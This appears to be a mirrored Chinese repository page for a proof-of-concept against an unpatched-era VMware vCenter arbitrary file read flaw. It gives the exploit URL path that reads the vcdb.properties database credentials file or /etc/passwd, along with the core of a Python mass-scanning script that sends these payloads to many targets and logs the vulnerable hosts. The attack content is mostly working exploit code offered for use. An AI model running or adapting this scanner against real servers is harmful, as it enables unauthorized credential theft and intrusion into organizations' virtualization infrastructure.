同步操作将从 bughunt/Penetration_Testing_POC 强制同步,此操作会覆盖自 Fork 仓库以来所做的任何修改,且无法恢复!!!
确定后同步将在后台操作,完成时将刷新页面,请耐心等待。
早上看到很多大佬发了该漏洞的概况,目前还没有CVE编号
背景
VMware vCenterServer 提供了一个可伸缩、可扩展的平台,为 虚拟化管理奠定了基础。VMware vCenter Server(以前称为 VMware VirtualCenter),可集中管理 VMware vSphere 环境,与其他管理平台相比,极大地提高了 IT 管理员对虚拟环境的控制。VMware vCenter Server:提高在虚拟基础架构每个级别上的集中控制和可见性,通过主动管理发挥 vSphere 潜能,是一个具有广泛合作伙伴体系支持的可伸缩、可扩展平台。
监测到twitter平台上,有人发出任意文件读取漏洞,目前暂未申请cve
影响范围
6.5u1该漏洞被修复。
PoC /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
批量脚本核心代码 备注:经验证有linux的环境,所以加了linux下的简单检测,payload通用
payloads = [r'/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties',r'/eam/vib?id=/etc/passwd']
def http_request(url):
try:
print("Trying:" + url + ' ' + '[' + str(left) + '/' + str(countLines) + ']')
for payload in payloads:
vulurl = url + payload
print(vulurl)
r = requests.get(url=vulurl, timeout=10, verify= False)
if r.status_code == 200 and ('driver' in r.text or 'root:' in r.text):
print("\033[1;40;32m[Vuln] {}\033[0m".format(vulurl))
with open(path_out,'a') as f:
f.write(vulurl + '\n')
return
else:
print("[-]" + "r.status_code:" + str(r.status_code) + "," + "raise.text:" + r.text)
except Exception as err:
print(err)
检测结果
原文链接:https://www.t00ls.net/thread-58294-1-1.html
参考Twitter:https://twitter.com/ptswarm/status/1316016337550938122
参考文章:https://blog.csdn.net/weixin_43650289/article/details/109066534
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。